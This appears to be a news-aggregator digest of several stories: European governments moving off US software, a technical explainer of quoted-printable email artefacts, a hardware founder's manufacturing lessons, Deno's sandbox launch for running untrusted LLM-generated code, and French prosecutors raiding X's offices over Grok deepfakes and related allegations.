10 interesting stories served every morning and every evening.




1 873 shares, 60 trendiness

France dumps Zoom and Teams as Europe seeks digital autonomy from the US

Add AP News as your pre­ferred source to see more of our sto­ries on Google.

Add AP News as your pre­ferred source to see more of our sto­ries on Google.

LONDON (AP) — In France, civil ser­vants will ditch Zoom and Teams for a home­grown video con­fer­ence sys­tem. Soldiers in Austria are us­ing open source of­fice soft­ware to write re­ports af­ter the mil­i­tary dropped Microsoft Office. Bureaucrats in a German state have also turned to free soft­ware for their ad­min­is­tra­tive work.

Around Europe, gov­ern­ments and in­sti­tu­tions are seek­ing to re­duce their use of dig­i­tal ser­vices from U. S. Big Tech com­pa­nies and turn­ing to do­mes­tic or free al­ter­na­tives. The push for digital sov­er­eignty” is gain­ing at­ten­tion as the Trump ad­min­is­tra­tion strikes an in­creas­ingly bel­liger­ent pos­ture to­ward the con­ti­nent, high­lighted by re­cent ten­sions over Greenland that in­ten­si­fied fears that Silicon Valley gi­ants could be com­pelled to cut off ac­cess.

Concerns about data pri­vacy and wor­ries that Europe is not do­ing enough to keep up with the United States and Chinese tech lead­er­ship are also fu­el­ing the drive.

The French gov­ern­ment ref­er­enced some of these con­cerns when it an­nounced last week that 2.5 mil­lion civil ser­vants would stop us­ing video con­fer­ence tools from U. S. providers — in­clud­ing Zoom, Microsoft Teams, Webex and GoTo Meeting — by 2027 and switch to Visio, a home­grown ser­vice.

The ob­jec­tive is to put an end to the use of non-Eu­ro­pean so­lu­tions, to guar­an­tee the se­cu­rity and con­fi­den­tial­ity of pub­lic elec­tronic com­mu­ni­ca­tions by re­ly­ing on a pow­er­ful and sov­er­eign tool,” the an­nounce­ment said.

We can­not risk hav­ing our sci­en­tific ex­changes, our sen­si­tive data, and our strate­gic in­no­va­tions ex­posed to non-Eu­ro­pean ac­tors,” David Amiel, a civil ser­vice min­is­ter, said in a press re­lease.

Microsoft said it con­tin­ues to partner closely with the gov­ern­ment in France and re­spect the im­por­tance of se­cu­rity, pri­vacy, and dig­i­tal trust for pub­lic in­sti­tu­tions.”

The com­pany said it is focused on pro­vid­ing cus­tomers with greater choice, stronger data pro­tec­tion, and re­silient cloud ser­vices — en­sur­ing data stays in Europe, un­der European law, with ro­bust se­cu­rity and pri­vacy pro­tec­tions.”

Zoom, Webex and GoTo Meeting did not re­spond to re­quests for com­ment.

French President Emmanuel Macron has been push­ing dig­i­tal sov­er­eignty for years. But there’s now a lot more political mo­men­tum be­hind this idea now that we need to de-risk from U. S. tech,” Nick Reiners, se­nior ge­ot­ech­nol­ogy an­a­lyst at the Eurasia Group.

It feels kind of like there’s a real zeit­geist shift,” Reiners said

It was a hot topic at the World Economic Forum’s an­nual meet­ing of global po­lit­i­cal and busi­ness elites last month in Davos, Switzerland. The European Commission’s of­fi­cial for tech sov­er­eignty, Henna Virkkunen, told an au­di­ence that Europe’s re­liance on oth­ers can be weaponized against us.”

That’s why it’s so im­por­tant that we are not de­pen­dent on one coun­try or one com­pany when it comes to very crit­i­cal fields of our econ­omy or so­ci­ety,” she said, with­out nam­ing coun­tries or com­pa­nies.

A de­ci­sive mo­ment came last year when the Trump ad­min­is­tra­tion sanc­tioned the International Criminal Court’s top pros­e­cu­tor af­ter the tri­bunal, based in The Hague, Netherlands, is­sued an ar­rest war­rant for Israeli Prime Minister Benjamin Netanyahu, an ally of President Donald Trump.

The sanc­tions led Microsoft to can­cel Khan’s ICC email, a move that was first re­ported by The Associated Press and sparked fears of a kill switch” that Big Tech com­pa­nies can use to turn off ser­vice at will.

Microsoft main­tains it kept in touch with the ICC throughout the process that re­sulted in the dis­con­nec­tion of its sanc­tioned of­fi­cial from Microsoft ser­vices. At no point did Microsoft cease or sus­pend its ser­vices to the ICC.”

Microsoft President Brad Smith has re­peat­edly sought to strengthen trans-At­lantic ties, the com­pa­ny’s press of­fice said, and pointed to an in­ter­view he did last month with CNN in Davos in which he said that jobs, trade and in­vest­ment. as well as se­cu­rity, would be af­fected by a rift over Greenland.

Europe is the American tech sec­tor’s biggest mar­ket af­ter the United States it­self. It all de­pends on trust. Trust re­quires di­a­logue,” Smith said.

Other in­ci­dents have added to the move­ment. There’s a grow­ing sense that re­peated EU ef­forts to rein in tech gi­ants such as Google with block­buster an­titrust fines and sweep­ing dig­i­tal rule books haven’t done much to curb their dom­i­nance.

Billionaire Elon Musk is also a fac­tor. Officials worry about re­ly­ing on his Starlink satel­lite in­ter­net sys­tem for com­mu­ni­ca­tions in Ukraine.

Washington and Brussels wran­gled for years over data trans­fer agree­ments, trig­gered by for­mer National Security Agency con­trac­tor Edward Snowden’s rev­e­la­tions of U. S. cy­ber-snoop­ing.

With on­line ser­vices now mainly hosted in the cloud through data cen­ters, Europeans fear that their data is vul­ner­a­ble.

U. S. cloud providers have re­sponded by set­ting up so-called sovereign cloud” op­er­a­tions, with data cen­ters lo­cated in European coun­tries, owned by European en­ti­ties and with phys­i­cal and re­mote ac­cess only for staff who are European Union res­i­dents.

The idea is that only Europeans can take de­ci­sions so that they can’t be co­erced by the U. S.,” Reiners said.

The German state of Schleswig-Holstein last year mi­grated 44,000 em­ployee in­boxes from Microsoft to an open source email pro­gram. It also switched from Microsoft’s SharePoint file shar­ing sys­tem to Nextcloud, an open source plat­form, and is even con­sid­er­ing re­plac­ing Windows with Linux and tele­phones and video­con­fer­enc­ing with open source sys­tems.

We want to be­come in­de­pen­dent of large tech com­pa­nies and en­sure dig­i­tal sov­er­eignty,” Digitalization Minister Dirk Schrödter said in an October an­nounce­ment.

The French city of Lyon said last year that it’s de­ploy­ing free of­fice soft­ware to re­place Microsoft. Denmark’s gov­ern­ment and the cities of Copenhagen and Aarhus have also been try­ing out open-source soft­ware.

We must never make our­selves so de­pen­dent on so few that we can no longer act freely,” Digital Minister Caroline Stage Olsen wrote on LinkedIn last year. Too much pub­lic dig­i­tal in­fra­struc­ture is cur­rently tied up with very few for­eign sup­pli­ers.”

The Austrian mil­i­tary said it has also switched to LibreOffice, a soft­ware pack­age with word proces­sor, spread­sheet and pre­sen­ta­tion pro­grams that mir­rors Microsoft 365’s Word, Excel and PowerPoint.

The Document Foundation, a non­profit based in Germany that’s be­hind LibreOffice, said the mil­i­tary’s switch reflects a grow­ing de­mand for in­de­pen­dence from sin­gle ven­dors.” Reports also said the mil­i­tary was con­cerned that Microsoft was mov­ing file stor­age on­line to the cloud — the stan­dard ver­sion of LibreOffice is not cloud-based.

Some Italian cities and re­gions adopted the soft­ware years ago, said Italo Vignoli, a spokesman for The Document Foundation. Back then, the ap­peal was not need­ing to pay for soft­ware li­censes. Now, it’s the main rea­son is to avoid be­ing locked into a pro­pri­etary sys­tem.

At first, it was: we will save money and by the way, we will get free­dom,” Vignoli said. Today it is: we will be free and by the way, we will also save some money.”

Associated Press writer Molly Quell in The Hague, Netherlands con­tributed to this re­port.

This ver­sion cor­rects the con­tri­bu­tion line to Molly Quell in­stead of Molly Hague.

...

Read the original on apnews.com »

2 621 shares, 28 trendiness

What’s up with all those equals signs anyway?

What’s up with all those equals signs any­way? IT”S DOING IT AGAIN!! Books on the Site for Magazines About Comics? There are too many plug stan­dards

What’s up with all those equals signs any­way?For some rea­son or other, peo­ple have been post­ing a lot of ex­cerpts from old emails on Twitter over the last few days. The most vi­tal ques­tion every­body’s ask­ing them­selves is: What’s up with all those equals signs?!And that’s some­thing I’m some­what of an ex­pert on. I mean, hav­ing writ­ten mail read­ers and stuff; not be­cause I’ve been to Caribbean is­lands. I’ve seen peo­ple con­fi­dently claim that it’s a code, or that it’s an arte­fact of scan­ning and then us­ing OCR, but it’s nei­ther — it’s just that who­ever con­verted these emails to a read­able for­mat were mo­rons.What’s that you say? Converted?! Surely emails are just text!!” Well, if you lived in the stone age (i.e., the 80s), they mostly were, but then peo­ple in­vented things like long lines” and rock döts”, and com­put­ers had to encode” the mail be­fore send­ing.The arte­fact we see here is from some­thing called quoted print­able”, or as we used to call it when it was in­tro­duced: Quoted un­read­able”.To take the first line. Whoever wrote this, typed in the fol­low­ing in their mail reader:we talked about de­sign­ing a pig with dif­fer­ent non- cloven hoofs in or­der to make kosher ba­conWe see that that’s quite a long line. Mail servers don’t like that, so mail soft­ware will break it into two lines, like so:we talked about de­sign­ing a pig with dif­fer­ent non- =

cloven hoofs in or­der to make kosher ba­con­See? There’s that equals sign! Yes, the equals sign is used to say this should re­ally be one sin­gle line, but I’ve bro­ken it in two so that the mail server does­n’t get mad at me”.The for­mal de­f­i­n­i­tion here is im­por­tant, though, so I have to be a bit tech­ni­cal here: To say this is a con­tin­u­a­tion line”, you in­sert an equals sign, then a car­riage re­turn, and then a line feed.=CRLF… non- =CRLF

cloven hoofs…When dis­play­ing this, we re­move all these three char­ac­ters, and end up

with:… non- cloven hoofs…So what’s hap­pened here? Well, who­ever col­lected these emails first con­verted from CRLF (also known as the Windows” line end­ing cod­ing, but it’s the stan­dard line end­ing in the SMTP stan­dard) to NL (i.e., Unix” line end­ing cod­ing). This is pretty nor­mal if you want to deal with email. But you then have one byte fewer:… non- =NL

cloven hoofs…If your al­go­rithm to de­code this is, stu­pidly, find equals signs at the end of the line, and then delete two char­ac­ters, and then fi­nally the equals sign”, you should end up with:… non- loven hoofs…I.e., you lose the c”. That’s al­most what hap­pened here, but not quite: Why does the equals sign still re­main?This StackOverflow post from 14 years ago ex­plains the phe­nom­e­non, sort of:Ob­vi­ously the client no­tices that = is not fol­lowed by a proper CR LF se­quence, so it as­sumes that it is not a soft line break, but a char­ac­ter en­coded in two hex dig­its, there­fore it reads the next two bytes. It should no­tice that the next two bytes are not valid hex dig­its, so its be­hav­ior is wrong too, but we have to ad­mit that at that point it does not have a chance to dis­play some­thing use­ful. They opted for the garbage in, garbage out ap­proach.That is, equals signs are also used for some­thing else be­sides wrap­ping long lines, and that’s what we see later in the post: =C2 please noteIf the equals sign is not at the end of a line, it’s used to en­code funny char­ac­ters”, like what you use with rock döts”. =C2 is 194, which is a first char­ac­ter in a UTF-8 se­quence, and the fol­low­ing char is most likely a =A0: =C2=A0 is non-breakable space”, which is some­thing peo­ple of­ten use to in­dent text (and the please note” is in­dented) and you see =A0 in many other places in these emails.My guess is that who­ever did this part just did a search-re­place for =C2 and/​or =A0 in­stead of us­ing a proper de­coder, but other ex­pla­na­tions are cer­tainly pos­si­ble. Any ideas?Any­way, that’s what’s up with those equals signs: 1) it’s tech­ni­cal”, and 2) it’s a com­bi­na­tion of buggy con­tin­u­a­tion line de­cod­ing and buggy non-ASCII de­cod­ing”, and 3) whoever processed these mails are in­com­pe­tent”. I don’t think 2) should be very sur­pris­ing at this point, do you?(Edit a bit later: To nit­pick a bit here: When the stan­dard was writ­ten, peo­ple mostly en­vi­sioned that the quoted-print­able con­tent trans­port en­cod­ing would be un­wound upon re­cep­tion (note transport”), and that you’d end up with clean text” on disk af­ter re­cep­tion. This did­n’t re­ally hap­pen, so all real” im­ple­men­ta­tions do the right thing with sin­gle-char­ac­ter (i.e., unencoded”) new­lines. For in­stance:(quoted-print­able-de­code-string he=\nllo”)

=> hello”Which leads me to as­sume that they reused an algo that was usu­ally run in an SMTP server con­text to do the line un­fold­ing — in that con­text, you can safely as­sume that the line end­ing is a CRLF. And by chance, this algo also works fine if you’re work­ing with a Windows-based file, but fails for a Unix-based file.)

...

Read the original on lars.ingebrigtsen.no »

3 620 shares, 37 trendiness

Qwen

...

Read the original on qwen.ai »

4 477 shares, 57 trendiness

Lessons Learned Shipping 500 Units of my First Hardware Product

1 year ago (Jan 2025) I quit my job as a soft­ware en­gi­neer to launch my first hard­ware prod­uct, Brighter, the world’s bright­est lamp. In March, af­ter $400k in sales through our crowd­fund­ing cam­paign, I had to fig­ure out how to man­u­fac­ture 500 units for our first batch. I had no prior ex­pe­ri­ence in hard­ware; I was count­ing on be­ing able to pick it up quickly with the help of a cou­ple of me­chan­i­cal/​elec­tri­cal/​firmware en­gi­neers.

The prob­lems be­gan im­me­di­ately. I sent our pro­to­type to a test­ing lab to ver­ify the bright­ness and var­i­ous col­orime­try met­rics. The tagline of Brighter was it’s 50,000 lu­mens — 25x brighter than a nor­mal lamp. Instead, de­spite our plan­ning & cal­cu­la­tions, it tested at 39,000 lu­mens caus­ing me to panic (just a lit­tle).

So with all hands on deck, in a cou­ple of weeks we in­creased the power by 20%, re­designed the elec­tron­ics to han­dle more LEDs, in­creased the size of the heatsink to dis­si­pate the ex­tra power, and im­proved the trans­mis­sion of light through the dif­fuser.

This time, we over­shot to 60,000 lu­mens but I’m not com­plain­ing.

Confident in our new de­sign I gave the go ahead to our main con­tract man­u­fac­turer in China to start pro­duc­tion of me­chan­i­cal parts. The heatsink had the longest lead time as it re­quired a mas­sive two ton die cast­ing mold ma­chined over the course of weeks. I planned my first trip to China for when the process would fin­ish.

Simultaneously in April, Trump an­nounced Liberation Day” tar­iffs, tak­ing the tar­iff rate for the lamp to 50%, promptly climb­ing to 100% then 150% with the en­su­ing trade war. That was the worst pe­riod of my life; I would go to bed lit­er­ally shak­ing with stress. In my opin­ion, Not Cool!

I was ad­vised to press for­ward with man­u­fac­tur­ing be­cause 150% is bonkers and will have to go down. So 2 months later in Zhongshan, China, I’m star­ing at a heatsink that looks com­pletely fucked. Due to a mis­com­mu­ni­ca­tion with the fac­tory, the in­jec­tion pins were moved in­side the heatsink fins, caus­ing the cylin­dri­cal ex­tru­sions be­low. I was just glad at least the fac­tory ex­isted.

I re­turned in August to test the full as­sem­bly with the now cor­rect heatsink. At my elec­tron­ics fac­tory as soon as we con­nect all the wiring, we no­tice the con­trols are com­pletely un­re­spon­sive. By Murphy’s Law (anything that can go wrong will go wrong), I had ex­pected some­thing like this to hap­pen, so I made sure to visit the fac­tory at 10am China Standard time, al­low­ing me to co­or­di­nate with my elec­tri­cal en­gi­neer at 9pm ET and my firmware en­gi­neer at 7:30am IST. We’re mea­sur­ing volt­ages across every part of the lamp and none of it makes sense. I post­pone my next sup­plier visit a cou­ple days so I can get this sorted out. At the end of the day, we fi­nally no­tice the la­bels on two PCB pins were swapped.

With a func­tional fully as­sem­bled lamp, we OK mass pro­duc­tion of the elec­tron­ics.

Our first full pieces from the pro­duc­tion line come out mid October. I air­ship them to San Francisco, and hand de­liver to our first cus­tomers. The rest are sched­uled for con­tainer load­ing end of October.

People like the light! A big SF startup or­ders a lot more. However, there is one is­sue I hear mul­ti­ple times: the knobs are scrap­ing and feel hor­ri­ble. With days un­til the 500 units are loaded into the con­tainer, I fran­ti­cally call with the en­gi­neer­ing team and fac­tory. Obviously this should­n’t be hap­pen­ing, we de­signed a gap be­tween the knobs and the wall to spin freely. After rounds of back and forth and mea­sure­ments, we fig­ure out in the de­sign for man­u­fac­tur­ing (DFM) process, the draw­ings the CNC sub-sup­plier re­ceived did not have the la­bel for spac­ing be­tween the knobs, re­sult­ing in a 0.5mm larger dis­tance than in­tended. Especially com­bined with the white pow­der coat­ing which was thicker than the black fin­ish, this caused some knobs to scrape.

Miraculously, within the re­main­ing days be­fore ship­ment, the fac­tory re­makes & pow­der coats 1000 new knobs that are 1mm smaller in di­am­e­ter.

The fac­tory sends me pho­tos of the con­tainer be­ing loaded. I have 3 weeks un­til the lamps ar­rive in the US — I en­joy the time with­out last minute en­gi­neer­ing prob­lems, al­beit know­ing in­evitably prob­lems will ap­pear again when cus­tomers start get­ting their lamps.

The lamps are processed by our ware­house Monday, Dec 12th, and shipped out di­rectly to cus­tomers via UPS. Starting Wednesday, around ~100 lamps are get­ting de­liv­ered every day. I wake up to 25 cus­tomer sup­port emails and by the time I’m done an­swer­ing them, I get 25 more. The pri­mary is­sue peo­ple have is the bot­tom wires are too short com­pared to the tubes.

It was at this point I truly be­gan to ap­pre­ci­ate Murphy’s law. In my case, any­thing not pre­cisely spec­i­fied and tested would with­out fail go wrong and bite me in the ass. Although we had spec­i­fied the to­tal length of the ca­ble, we did­n’t de­fine the length of ca­ble pro­trud­ing from the base. As such, some as­sem­bly work­ers in the fac­tory put far too much wire in the base of the lamp, not leav­ing enough for it to be as­sem­bled. Luckily cus­tomers were able to fix this by un­screw­ing the base, but far from an ideal ex­pe­ri­ence.

There were other in­stances of qual­ity con­trol where I laughed at the ab­sur­dity: the lamp comes with a sheet of glass that goes over the LEDs, and a screw­driver & screws to at­tach it. For one cus­tomer, the screw­driver com­pletely broke. (First time in my life I’ve seen a bro­ken screw­driver…) For oth­ers, it came dull. The screw­driver sub sup­plier also shipped us two dif­fer­ent types of screws, some of which were per­fect, and oth­ers which were coun­ter­sunk and con­se­quently too short to be ac­tu­ally screwed in.

Coming from soft­ware, the most plan­ning you’re ex­posed to is lin­ear tick­ets, sprints, and set­ting OKRs. If you missed a dead­line, it’s of­ten be­cause you re-pri­or­i­tized, so no harm done.

In hard­ware, the de­vel­op­ment life­cy­cle of a prod­uct is many months. If you mess up tool­ing, or mass pro­duce a part in­cor­rectly, or just sub-op­ti­mally plan, you set back the time­line ap­pre­cia­bly and there’s noth­ing you can do but curse your­self. I found my­self reach­ing for more old school” plan­ning tools like Gantt charts, and also build­ing my own tools. Make sure you have every step of the process ac­counted for. Assume you’ll go through many it­er­a­tions of the same part; dou­ble your time­lines.

In soft­ware, bud­get­ing is fairly lax, es­pe­cially in the VC funded startup space where all you need to know is your run­way (mainly cal­cu­lated from your em­ployee salaries and cloud costs).

With [profitable] hard­ware busi­nesses, your mar­gin for er­ror is much lower. Literally, your gross mar­gin is lower! If you sell out be­cause you miss a ship­ment or don’t fore­cast de­mand cor­rectly, you lose rev­enue. If you mis-time your in­ven­tory buy­ing, your bank ac­count can eas­ily go neg­a­tive. Accounting is a must, and the more de­tailed the bet­ter. Spreadsheets are your best friend. The fund­ing model is also much dif­fer­ent: in­stead of re­ly­ing heav­ily on eq­uity, most growth is debt-fi­nanced. You have real li­a­bil­i­ties!

Anything that can go wrong will go wrong. Anything you don’t spec­ify will fail to meet the im­plicit spec­i­fi­ca­tion. Any pro­ject or com­po­nent not ac­tively pushed will stall. At pre­vi­ous (software) com­pa­nies I’ve worked at, if some­one fol­lowed up on a task, I took it to mean the task was off track and some­body was to blame. With a hard­ware prod­uct, there are a mil­lion balls in the air and you need to keep track of all of them. Though some­what an­noy­ing, con­stant check­ins sim­ply math-out to be nec­es­sary. The cost of fail­ure or de­lays is too high. Nowadays as a con­tainer gets closer to ship­ment date, I have daily calls with my fac­to­ries. I found my­self agree­ing with a lot of Ben Kuhn’s blog post on run­ning ma­jor pro­jects (his blog post on light­ing was also a ma­jor in­spi­ra­tion for the prod­uct).

When I worked at Meta, every PR had to be ac­com­pa­nied with a test plan. I took that phi­los­o­phy to Brighter, try­ing to rig­or­ously test the out­comes we were aim­ing for (thermals, lu­mens, power, etc…), but I still en­coun­tered sur­pris­ing fail­ures. In soft­ware if you have cov­er­age for a code path, you can feel pretty con­fi­dent about it. Unfortunately hard­ware is al­most the op­po­site of re­peat­able. Blink and you’ll get a dif­fer­ent mea­sure­ment. I’m not an ex­pert, but at this point I’ve ac­cepted the only way to get a sem­blance of con­fi­dence for my met­rics is test­ing on mul­ti­ple units in dif­fer­ent en­vi­ron­ments.

As some­one who gen­er­ally stays out of pol­i­tics, I did­n’t know much about the in­com­ing ad­min­is­tra­tion’s stance to­wards tar­iffs, though I don’t think any­one could have pre­dicted such dras­tic hikes. Regardless, it’s some­thing you should be acutely aware of; take it into con­sid­er­a­tion when de­cid­ing what coun­try to man­u­fac­ture in, make sure it’s in your fi­nan­cial mod­els with room to spare, etc…

I wish I had vis­ited my sup­pli­ers much ear­lier, back when we were still pro­to­typ­ing with them. Price should­n’t be an is­sue — a trip to China is go­ing to be triv­ially cheap com­pared to buy­ing in­ven­tory, even more so com­pared to mess­ing up a man­u­fac­tur­ing run due to mis­com­mu­ni­ca­tion. Most sup­pli­ers don’t get in­ter­na­tional vis­i­tors of­ten, es­pe­cially Americans. Appearing in per­son con­veys se­ri­ous­ness, and I found it greatly im­proved com­mu­ni­ca­tion ba­si­cally im­me­di­ately af­ter my first visit. Plus China is very dif­fer­ent from the US and it’s cool to see!

To me, this process has felt like an ex­er­cise in mak­ing mis­takes and learn­ing painful lessons. However, I think I did do a cou­ple of key things right:

The first thing I did be­fore start­ing man­u­fac­tur­ing—and even be­fore the crowd­fund­ing cam­paign—was set­ting up a sim­ple web­site where peo­ple could pay $10 to get a steep dis­count off the MSRP. Before I com­mit­ted time and money, I needed to know this would be self-sus­tain­ing from the get go. It turns out that peo­ple were happy to give their email and put down a de­posit, even when the only prod­uct pho­tos I had were from a ren­der artist on fiverr!

From talk­ing to other hard­ware founders, these kinds of mis­takes hap­pen to every­one; hard­ware is hard as they say. It’s im­por­tant to have a healthy enough busi­ness model to stom­ach these mis­takes and still be able to grow.

Coolest Cooler had an in­cred­i­bly suc­cess­ful crowd­fund­ing cam­paign, partly be­cause they packed a lot of fea­tures into a very at­trac­tively priced prod­uct. Unfortunately, it was too at­trac­tively priced, and part­way through man­u­fac­tur­ing they re­al­ized they did­n’t have enough money to ac­tu­ally de­liver all the units, lead­ing to a slow and painful bank­ruptcy.

When the first 500 units were be­ing de­liv­ered, I knew there were bound to be is­sues. For that first week, I was lit­er­ally chron­i­cally on my gmail. I would try to re­spond to every cus­tomer sup­port is­sue within 1-2 min­utes if pos­si­ble (it was not con­ducive to my sleep that many of our cus­tomers were in the EU).

Some cus­tomers still had some is­sues with the con­trol tube knobs & firmware. I ac­knowl­edged that they were sub­par and de­cided to re-make the full batch of con­trol tubes prop­erly (with the cor­rect knob spac­ing), as well as up­dated firmware & other im­prove­ments, and ship them to cus­tomers free of charge.

Overall, it’s been a very dif­fer­ent but in­cred­i­bly re­ward­ing ex­pe­ri­ence com­pared to work­ing as a soft­ware en­gi­neer. It’s so cool to see some­thing I built in my friends houses, and equally cool when peo­ple leave com­pletely un­prompted re­views:

...

Read the original on www.simonberens.com »

5 384 shares, 28 trendiness

Introducing Deno Sandbox

Over the past year, we’ve seen a shift in what Deno Deploy cus­tomers are build­ing: plat­forms where users gen­er­ate code with LLMs, and that code runs im­me­di­ately with­out re­view. That code fre­quently calls LLMs it­self, which means it needs API keys and net­work ac­cess.

This is­n’t the tra­di­tional run un­trusted plu­g­ins” prob­lem. It’s deeper: LLM-generated code, call­ing ex­ter­nal APIs with real cre­den­tials, with­out hu­man re­view. Sandboxing the com­pute is­n’t enough. You need to con­trol net­work egress and pro­tect se­crets from ex­fil­tra­tion.

Deno Sandbox pro­vides both. And when the code is ready, you can de­ploy it di­rectly to Deno Deploy with­out re­build­ing.

You don’t want to run un­trusted code (generated by your LLMs, your users LLMs, or even hand writ­ten by users) di­rectly on your server. It will com­pro­mise your sys­tem, steal your API keys, and call out to evil.com. You need iso­la­tion.

Deno Sandbox gives you light­weight Linux mi­croVMs (running in the Deno Deploy cloud) to run un­trusted code with de­fense-in-depth se­cu­rity. You cre­ate or pro­gram­mat­i­cally via our JavaScript or Python SDKs, and they boot in un­der a sec­ond. You can also in­ter­act with them via SSH, HTTP, or even open a VS Code win­dow di­rectly into the sand­box.

im­port { Sandbox } from @deno/sandbox”;

await us­ing sand­box = await Sandbox.create();

await sand­box.sh`ls -lh /`;

But there is more. In Deno Sandbox, se­crets never en­ter the en­vi­ron­ment. Code sees only a place­holder:

im­port { Sandbox } from @deno/sandbox”;

await us­ing sand­box = await Sandbox.create({

se­crets: {

OPENAI_API_KEY: {

hosts: [“api.openai.com”],

value: process.env.OPE­NAI_API_KEY,

await sand­box.sh`echo $OPENAI_API_KEY`;

// DENO_SECRET_PLACEHOLDER_b14043a2f578cba75ebe04791e8e2c7d4002fd0c1f825e19…

The real key ma­te­ri­al­izes only when the sand­box makes an out­bound re­quest to an ap­proved host. If prompt-in­jected code tries to ex­fil­trate that place­holder to

evil.com? Useless.

You can also re­strict which hosts the sand­box can talk to:

await us­ing sand­box = await Sandbox.create({

al­lowNet: [“api.openai.com”, *.anthropic.com”],

Any re­quest to an un­listed host gets blocked at the VM bound­ary.

Both fea­tures are im­ple­mented via an out­bound proxy sim­i­lar to

coder/​http­jail. This gives us a choke­point for pol­icy en­force­ment. We plan to add more ca­pa­bil­i­ties here: an­a­lyt­ics for out­bound con­nec­tions and pro­gram­matic hooks for trusted code to in­spect or mod­ify re­quests.

If you’re run­ning un­trusted JavaScript or TypeScript, com­bine this with Deno’s

–allow-net flag for de­fense in depth: VM-level net­work re­stric­tions plus run­time-level per­mis­sions.

sand­box.de­ploy() de­ploys code from your sand­box di­rectly to Deno Deploy.

const build = await sand­box.de­ploy(“my-app”, {

pro­duc­tion: true,

build: { mode: none”, en­try­point: server.ts” },

const re­vi­sion = await build.done;

con­sole.log(re­vi­sion.url);

One call to go from sand­box to pro­duc­tion de­ploy­ment. No re­build­ing in a dif­fer­ent CI sys­tem, no re-au­then­ti­cat­ing with a dif­fer­ent tool. Just turn your dev en­vi­ron­ment di­rectly into a pro­duc­tion ready, auto-scal­ing server­less de­ploy­ment.

Sandboxes are ephemeral by de­fault, but when you need state we have you cov­ered:

Run apt-get in­stall once, snap­shot it, and every fu­ture sand­box boots with every­thing al­ready in­stalled. Create read-write vol­umes from the snap­shots to cre­ate a fresh de­vel­op­ment en­vi­ron­ment in sec­onds.

Deno Sandbox is in­cluded in your Deno Deploy plan with com­pet­i­tive, us­age-based pric­ing. You pay for com­pute time, not wall-clock time.

We’re ex­cited to see what you (or your AI agents) build with Deno Sandbox.

...

Read the original on deno.com »

6 286 shares, 16 trendiness

X offices raided in France as prosecutors investigate child abuse images and deepfakes

Add AP News as your pre­ferred source to see more of our sto­ries on Google.

Add AP News as your pre­ferred source to see more of our sto­ries on Google.

PARIS (AP) — French pros­e­cu­tors raided the of­fices of so­cial me­dia plat­form X on Tuesday as part of a pre­lim­i­nary in­ves­ti­ga­tion into al­le­ga­tions that in­clude spread­ing child sex­ual abuse im­ages and deep­fakes. They have also sum­moned bil­lion­aire owner Elon Musk for ques­tion­ing.

X and Musk’s ar­ti­fi­cial in­tel­li­gence com­pany xAI also face in­ten­si­fy­ing scrutiny from Britain’s data pri­vacy reg­u­la­tor, which opened for­mal in­ves­ti­ga­tions into how they han­dled per­sonal data when they de­vel­oped and de­ployed Musk’s ar­ti­fi­cial in­tel­li­gence chat­bot Grok.

Grok, which was built by xAI and is avail­able through X, sparked global out­rage last month af­ter it pumped out a tor­rent of sex­u­al­ized non­con­sen­sual deep­fake im­ages in re­sponse to re­quests from X users.

The French in­ves­ti­ga­tion was opened in January last year by the pros­e­cu­tors’ cy­ber­crime unit, the Paris pros­e­cu­tors’ of­fice said in a state­ment. It’s look­ing into al­leged complicity” in pos­sess­ing and spread­ing porno­graphic im­ages of mi­nors, sex­u­ally ex­plicit deep­fakes, de­nial of crimes against hu­man­ity and ma­nip­u­la­tion of an au­to­mated data pro­cess­ing sys­tem as part of an or­ga­nized group, among other charges.

Prosecutors asked Musk and for­mer CEO Linda Yaccarino to at­tend voluntary in­ter­views” on April 20. Employees of X have also been sum­moned that same week to be heard as wit­nesses, the state­ment said. Yaccarino was CEO from May 2023 un­til July 2025.

In a post on its own ser­vice deny­ing the al­le­ga­tions, X railed against the raid on its Paris of­fice as an abu­sive act of law en­force­ment the­ater de­signed to achieve il­le­git­i­mate po­lit­i­cal ob­jec­tives rather than ad­vance le­git­i­mate law en­force­ment goals rooted in the fair and im­par­tial ad­min­is­tra­tion of jus­tice.”

In a mes­sage posted on X, the Paris pros­e­cu­tors’ of­fice an­nounced the on­go­ing searches at the com­pa­ny’s of­fices in France and said it was leav­ing the plat­form while call­ing on fol­low­ers to join it on other so­cial me­dia.

At this stage, the con­duct of the in­ves­ti­ga­tion is based on a con­struc­tive ap­proach, with the aim of ul­ti­mately en­sur­ing that the X plat­form com­plies with French law, as it op­er­ates on the na­tional ter­ri­tory,” the pros­e­cu­tors’ state­ment said.

European Union po­lice agency Europol is sup­port­ing the French au­thor­i­ties in this,” Europol spokesper­son Jan Op Gen Oorth told the AP, with­out elab­o­rat­ing.

French au­thor­i­ties opened their in­ves­ti­ga­tion af­ter re­ports from a French law­maker al­leg­ing that bi­ased al­go­rithms on X likely dis­torted the func­tion­ing of an au­to­mated data pro­cess­ing sys­tem.

It ex­panded af­ter Grok gen­er­ated posts that al­legedly de­nied the Holocaust, a crime in France, and spread sex­u­ally ex­plicit deep­fakes, the state­ment said.

Grok wrote in a widely shared post in French that gas cham­bers at the Auschwitz-Birkenau death camp were de­signed for disinfection with Zyklon B against ty­phus” rather than for mass mur­der — lan­guage long as­so­ci­ated with Holocaust de­nial.

In later posts on X, the chat­bot re­versed it­self and ac­knowl­edged that its ear­lier re­ply was wrong, say­ing it had been deleted and pointed to his­tor­i­cal ev­i­dence that Zyklon B was used to kill more than 1 mil­lion peo­ple in Auschwitz gas cham­bers.

The chat­bot also ap­peared to praise Adolf Hitler last year, in com­ments that X took down af­ter com­plaints.

In Britain, the Information Commissioner’s Office said it’s look­ing into whether X and xAI fol­lowed the law when pro­cess­ing per­sonal data and whether Grok had any mea­sures in place to pre­vent its use to gen­er­ate harmful ma­nip­u­lated im­ages.”

The re­ports about Grok raise deeply trou­bling ques­tions about how peo­ple’s per­sonal data has been used to gen­er­ate in­ti­mate or sex­u­alised im­ages with­out their knowl­edge or con­sent, and whether the nec­es­sary safe­guards were put in place to pre­vent this,” said William Malcolm, an ex­ec­u­tive di­rec­tor at the watch­dog.

He did­n’t spec­ify what the penalty would be if the probe found the com­pa­nies did­n’t com­ply with data pro­tec­tion laws.

A sep­a­rate in­ves­ti­ga­tion into Grok launched last month by the U. K. me­dia reg­u­la­tor, Ofcom, is on­go­ing.

Ofcom said Tuesday it’s still gath­er­ing ev­i­dence and warned the probe could take months.

